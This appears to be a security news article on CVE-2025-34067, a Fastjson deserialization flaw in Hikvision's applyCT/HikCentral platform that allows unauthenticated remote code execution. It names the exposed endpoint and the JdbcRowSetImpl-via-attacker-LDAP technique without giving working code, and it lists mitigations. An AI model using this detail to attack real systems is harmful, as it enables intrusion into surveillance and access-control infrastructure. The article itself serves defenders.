A newly discovered vulnerability in Hikvision’s widely used applyCT security management platform has put thousands of surveillance and monitoring infrastructures at risk, raising urgent concerns for organizations worldwide.
Tracked as CVE-2025-34067 and rated with the maximum severity (CVSS 10), the flaw allows for unauthenticated remote code execution (RCE), potentially granting attackers full control over affected systems.
How the Vulnerability Works
The vulnerability stems from the use of a vulnerable version of the Fastjson library in the applyCT component of the Hikvision Integrated Security Management Platform (also known as HikCentral).
Fastjson is a popular Java library for parsing JSON data, but its “auto-type” feature can be exploited if improperly configured.
Attackers can send a specially crafted JSON payload to the /bic/ssoService/v1/applyCT endpoint, tricking the system into deserializing a malicious Java class, specifically JdbcRowSetImpl—from an attacker-controlled LDAP server.
This attack vector does not require authentication, meaning any exposed system is vulnerable over the internet.
Once exploited, attackers can execute arbitrary commands, hijack surveillance feeds, manipulate security devices, or move laterally within the network, potentially launching further internal attacks.
Impact and Urgent Mitigation Steps
Hikvision’s applyCT platform is a cornerstone for security operations in commercial, governmental, and industrial sectors, providing centralized management of video, access, intercom, and alarm systems.
Its integration with advanced analytics and scalability has made it a trusted solution for high-security environments.
However, this critical flaw turns a cybersecurity issue into a physical security threat, as attackers could disrupt or disable entire surveillance operations.
Security experts urge organizations using Hikvision applyCT or any HikCentral variant to act immediately:
- Audit systems to identify the exposure of the vulnerable
/bic/ssoService/v1/applyCTendpoint. - Update to a patched Fastjson library or apply security updates provided by Hikvision.
- Restrict internet access to the system unless necessary.
- Monitor for suspicious LDAP traffic that could indicate exploitation attempts.
Failure to address this vulnerability could result in unauthorized access, data breaches, operational disruption, financial loss, and reputational damage.
Given the widespread deployment of Hikvision platforms, the urgency to patch and secure affected systems cannot be overstated.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=Tracked as CVE-2025-34067 and rated with the maximum severity (CVSS 10), the flaw allows for unauthenticated remote code execution,){kind=link}